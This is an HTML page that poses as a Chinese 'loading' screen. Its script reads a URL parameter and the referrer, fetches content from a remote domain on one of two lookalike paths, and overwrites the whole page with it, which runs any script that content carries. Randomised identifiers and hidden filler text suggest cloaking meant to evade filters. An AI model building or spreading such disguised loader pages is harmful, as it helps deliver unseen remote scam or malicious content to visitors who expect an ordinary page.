<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eh8dqe66p {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eh8dqe66p .DRygBV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eh8dqe66p .content {
            line-height: 50px;
            text-align: center
        }

        .eh8dqe66p .img {
            width: 100%
        }

        .eh8dqe66p .f2U3Oq {
            text-align: center
        }

        .eh8dqe66p .f2U3Oq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eh8dqe66p .f2U3Oq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eh8dqe66p .f2U3Oq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eh8dqe66p .f2U3Oq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eh8dqe66p .f2U3Oq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eh8dqe66p .f2U3Oq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eh8dqe66p .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nlecBGY0mHk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mnL9m = nlecBGY0mHk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mnL9m +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mnL9m +".html?a=share";
		}
		
        m2G56xqu=url+"#"+new Date().getTime();
        m2G56xqu && function() {
            $.get(m2G56xqu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>YWdeQxczKqsuIHfJaMDjS3OZBF</span>
<li style='display:none' >eAUcrRb58nhF6p5jFnSst6oYViSMsT3zbXhCP9rsZ0Kt6qFvJZNLtvO83QZuVD4jDeuORR4zq</li>
<ul style='display:none' >apBSORu8rU3x94s8lSJUzHuBgJjt544bjVLeLQSNdMpJcuNwhr39dIklgoYUaiK</ul><div class="eh8dqe66p">
    <div class="DRygBV">
        <div class="f2U3Oq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >KczBBf9uOhnArtQOKwWWS1uVhPX0EfXrMS7PVSBBBS63AjeWkVpru</ul>
<span style='display:none'>h9AoU0ZgQmwUPWvi</span>
<li style='display:none' >XUr7G7e8vPekLKEeu7rxzUv8V0j8tSQbYDBpwvkPtfRSL1Y0zxUvCODa3jYlu2cxnTWt2eTPsR9ol6t2</li>
<ul style='display:none' >KczBBf9uOhnArtQOKwWWS1uVhPX0EfXrMS7PVSBBBS63AjeWkVpru</ul></body>
</html>